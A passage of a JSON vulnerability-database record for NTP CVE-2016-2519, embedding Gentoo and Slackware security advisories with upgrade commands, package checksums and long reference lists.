identifiers referenced below for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll NTP users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-misc/ntp-4.2.8_p8\"\n\nReferences\n==========\n\n[ 1 ] CVE-2015-7691\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7691\n[ 2 ] CVE-2015-7692\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7692\n[ 3 ] CVE-2015-7701\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7701\n[ 4 ] CVE-2015-7702\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7702\n[ 5 ] CVE-2015-7703\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7703\n[ 6 ] CVE-2015-7704\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7704\n[ 7 ] CVE-2015-7705\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7705\n[ 8 ] CVE-2015-7848\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7848\n[ 9 ] CVE-2015-7849\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7849\n[ 10 ] CVE-2015-7850\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7850\n[ 11 ] CVE-2015-7851\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7851\n[ 12 ] CVE-2015-7852\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7852\n[ 13 ] CVE-2015-7853\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7853\n[ 14 ] CVE-2015-7854\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7854\n[ 15 ] CVE-2015-7855\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7855\n[ 16 ] CVE-2015-7871\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7871\n[ 17 ] CVE-2015-7973\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7973\n[ 18 ] CVE-2015-7974\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7974\n[ 19 ] CVE-2015-7975\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7975\n[ 20 ] CVE-2015-7976\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7976\n[ 21 ] CVE-2015-7977\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7977\n[ 22 ] CVE-2015-7978\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7978\n[ 23 ] CVE-2015-7979\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7979\n[ 24 ] CVE-2015-8138\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8138\n[ 25 ] CVE-2015-8139\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8139\n[ 26 ] CVE-2015-8140\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8140\n[ 27 ] CVE-2015-8158\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8158\n[ 28 ] CVE-2016-1547\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1547\n[ 29 ] CVE-2016-1548\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1548\n[ 30 ] CVE-2016-1549\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1549\n[ 31 ] CVE-2016-1550\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1550\n[ 32 ] CVE-2016-1551\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1551\n[ 33 ] CVE-2016-2516\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2516\n[ 34 ] CVE-2016-2517\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2517\n[ 35 ] CVE-2016-2518\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2518\n[ 36 ] CVE-2016-2519\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2519\n[ 37 ] CVE-2016-4953\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4953\n[ 38 ] CVE-2016-4954\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4954\n[ 39 ] CVE-2016-4955\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4955\n[ 40 ] CVE-2016-4956\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4956\n[ 41 ] CVE-2016-4957\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4957\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201607-15\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n[slackware-security] ntp (SSA:2016-120-01)\n\nNew ntp packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\nand -current to fix security issues. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/ntp-4.2.8p7-i486-1_slack14.1.txz: Upgraded. \n This release patches several low and medium severity security issues:\n CVE-2016-1551: Refclock impersonation vulnerability, AKA: refclock-peering\n CVE-2016-1549: Sybil vulnerability: ephemeral association attack,\n AKA: ntp-sybil - MITIGATION ONLY\n CVE-2016-2516: Duplicate IPs on unconfig directives will cause an assertion\n botch\n CVE-2016-2517: Remote configuration trustedkey/requestkey values are not\n properly validated\n CVE-2016-2518: Crafted addpeer with hmode \u003e 7 causes array wraparound with\n MATCH_ASSOC\n CVE-2016-2519: ctl_getitem() return value not always checked\n CVE-2016-1547: Validate crypto-NAKs, AKA: nak-dos\n CVE-2016-1548: Interleave-pivot - MITIGATION ONLY\n CVE-2015-7704: KoD fix: peer associations were broken by the fix for\n NtpBug2901, AKA: Symmetric active/passive mode is broken\n CVE-2015-8138: Zero Origin Timestamp Bypass, AKA: Additional KoD Checks\n CVE-2016-1550: Improve NTP security against buffer comparison timing attacks,\n authdecrypt-timing, AKA: authdecrypt-timing\n For more information, see:\n http://support.ntp.org/bin/view/Main/SecurityNotice#Recent_Vulnerabilities\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7704\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8138\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1547\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1548\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1549\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1550\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1551\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2516\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2517\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2518\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2519\n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8p7-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8p7-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8p7-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8p7-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8p7-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8p7-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p7-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p7-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p7-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p7-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p7-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p7-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 package:\n785dc2ef5f80edb28dc781e261c3fe3f ntp-4.2.8p7-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n899421096b7b63e6cb269f8b01dfd875 ntp-4.2.8p7-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\ndfd34cbd31be3572a2bcae7f59cdfd91 ntp-4.2.8p7-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n63c4b31736040e7950361cd0d7081c8b ntp-4.2.8p7-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\ne760ae0c6cc3fa933e4d65d6995b0c84 ntp-4.2.8p7-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\naa448523b27bb4fcccc2f46cf4d72bc5 ntp-4.2.8p7-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\n3bc7e54a4164a4f91be996b5cf2e643e ntp-4.2.8p7-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n0f6ea4dae476709f26f5d0e33378576c ntp-4.2.8p7-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\ndbe827ee7ece6ce5ca083cdd5960162c ntp-4.2.8p7-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n89f3edf183a6a9847d69b8349f98c901 ntp-4.2.8p7-x86_64-1_slack14.1.txz\n\nSlackware -current package:\n4018b86edd15e40e8c5e9f50d907dcff n/ntp-4.2.8p7-i586-1.txz\n\nSlackware x86_64 -current package:\n7dd6b64ba8c9fdaebb7becc1f5c3963d n/ntp-4.2.8p7-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the package as root:\n# upgradepkg ntp-4.2.8p7-i486-1_slack14.1.txz\n\nThen, restart the NTP daemon:\n\n# sh /etc/rc.d/rc.ntpd restart\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. |\n+------------------------------------------------------------------------+\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niEYEARECAAYFAlcjyyAACgkQakRjwEAQIjPtSgCdEB0YxCNSAabWZwD+ICyXcqeg\n3rIAnRLKXh7P6QXP2t+va4PM0crnd3l4\n=VO7T\n-----END PGP SIGNATURE-----\n", "sources": [ { "db": "NVD", "id": "CVE-2016-2519" }, { "db": "CERT/CC", "id": "VU#718152" }, { "db": "JVNDB", "id": "JVNDB-2016-007715" }, { "db": "BID", "id": "88204" }, { "db": "VULMON", "id": "CVE-2016-2519" }, { "db": "PACKETSTORM", "id": "143259" }, { "db": "PACKETSTORM", "id": "137992" }, { "db": "PACKETSTORM", "id": "136864" } ], "trust": 2.97 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "CERT/CC", "id": "VU#718152", "trust": 3.6 }, { "db": "NVD", "id": "CVE-2016-2519", "trust": 3.1 }, { "db": "BID", "id": "88204", "trust": 2.0 }, { "db": "SECTRACK", "id": "1035705", "trust": 1.1 }, { "db": "JVN", "id": "JVNVU91176422", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2016-007715", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201604-610", "trust": 0.6 }, { "db": "VULMON", "id": "CVE-2016-2519", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "143259", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "137992", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "136864", "trust": 0.1 } ], "sources": [ { "db": "CERT/CC", "id": "VU#718152" }, { "db": "VULMON", "id": "CVE-2016-2519" }, { "db": "BID", "id": "88204" }, { "db": "JVNDB", "id": "JVNDB-2016-007715" }, { "db": "PACKETSTORM", "id": "143259" }, { "db": "PACKETSTORM", "id": "137992" }, { "db": "PACKETSTORM", "id": "136864" }, { "db": "NVD", "id": "CVE-2016-2519" }, { "db": "CNNVD", "id": "CNNVD-201604-610" } ] }, "id": "VAR-201701-0396", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.33987721 }, "last_update_date": "2023-12-18T11:26:08.913000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Oracle Solaris Third Party Bulletin - April 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html" }, { "title": "NTP Bug 3008", "trust": 0.8, "url": "http://support.ntp.org/bin/view/main/ntpbug3008" }, { "title": "ntpd Remediation measures for denial of service vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=61293" }, { "title": "Red Hat: CVE-2016-2519", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2016-2519" }, { "title": "Ubuntu Security Notice: ntp vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3349-1" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=976a4da35d55283870dbb31b88a6c655" } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2519" }, { "db": "JVNDB", "id": "JVNDB-2016-007715" }, { "db": "CNNVD", "id": "CNNVD-201604-610" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-007715" }, { "db": "NVD", "id": "CVE-2016-2519" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.9, "url": "https://www.kb.cert.org/vuls/id/718152" }, { "trust": 1.8, "url": "http://www.securityfocus.com/bid/88204" }, { "trust": 1.7, "url": "http://support.ntp.org/bin/view/main/ntpbug3008" }, { "trust": 1.4, "url": "http://support.ntp.org/bin/view/main/securitynotice#april_2016_ntp_4_2_8p7_security" }, { "trust": 1.2, "url": "https://security.gentoo.org/glsa/201607-15" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1035705" }, { "trust": 1.1, "url": "https://security.netapp.com/advisory/ntap-20171004-0002/" }, { "trust": 1.1, "url": "https://security.freebsd.org/advisories/freebsd-sa-16:16.ntp.asc" }, { "trust": 0.9, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2519" }, { "trust": 0.8, "url": "http://support.ntp.org/bin/view/main/securitynotice#january_2016_ntp_4_2_8p6_securit" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu91176422/" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-2519" }, { "trust": 0.3, "url": "http://www.ntp.org/" }, { "trust": 0.3, "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160428-ntpd" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024073" }, { "trust": 0.3, "url": "http://support.ntp.org/bin/view/main/ntpbug3008 " }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21983803" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/ntp_advisory7.asc" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2519" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8138" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7704" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1547" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/119.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2519" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/3349-1/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7431" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-9311" }, { "trust": 0.1, "url": "https://www.ubuntu.com/usn/usn-3349-1" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-6460" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7429" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-6458" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-9310" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-9042" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.8p9+dfsg-2ubuntu1.1" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-6463" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7428" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7434" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-6462" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.8p8+dfsg-1ubuntu2.1" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7427" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu2.14.04.11" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-6464" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7426" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.8p4+dfsg-3ubuntu5.5" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7433" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7871" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7702" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7705" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1549" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7702" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7849" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7852" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7978" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8140" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7855" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7978" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7852" }, { "trust": 0.1, "url": "https://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1551" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2516" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7975" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7848" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7973" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7979" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8139" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8158" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4954" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4956" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7973" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7853" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7701" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7704" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8140" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7974" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7691" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8139" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4957" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7703" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7855" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4955" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7849" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7854" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7703" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7705" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2517" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1548" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7691" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1547" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8158" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7854" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7853" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2519" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2518" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7851" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7692" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7871" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7977" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7848" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7977" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1550" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7850" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7850" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7701" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7692" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8138" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7979" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7974" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7851" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4953" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7975" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7976" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7976" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2516" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7704" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1551" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1548" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2516" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2517" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1550" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1547" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-8138" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2518" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1549" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1551" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1550" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2518" }, { "trust": 0.1, "url": "http://support.ntp.org/bin/view/main/securitynotice#recent_vulnerabilities" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2517" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1548" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1549" } ], "sources": [ { "db": "CERT/CC", "id": "VU#718152" }, { "db": "VULMON", "id": "CVE-2016-2519" }, { "db": "BID", "id": "88204" }, { "db": "JVNDB", "id": "JVNDB-2016-007715" }, { "db": "PACKETSTORM", "id": "143259" }, { "db": "PACKETSTORM", "id": "137992" }, { "db": "PACKETSTORM", "id": "136864" }, { "db": "NVD", "id": "CVE-2016-2519" }, { "db": "CNNVD", "id": "CNNVD-201604-610" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CERT/CC", "id": "VU#718152" }, { "db": "VULMON", "id": "CVE-2016-2519" }, { "db": "BID", "id": "88204" }, { "db": "JVNDB", "id": "JVNDB-2016-007715" }, { 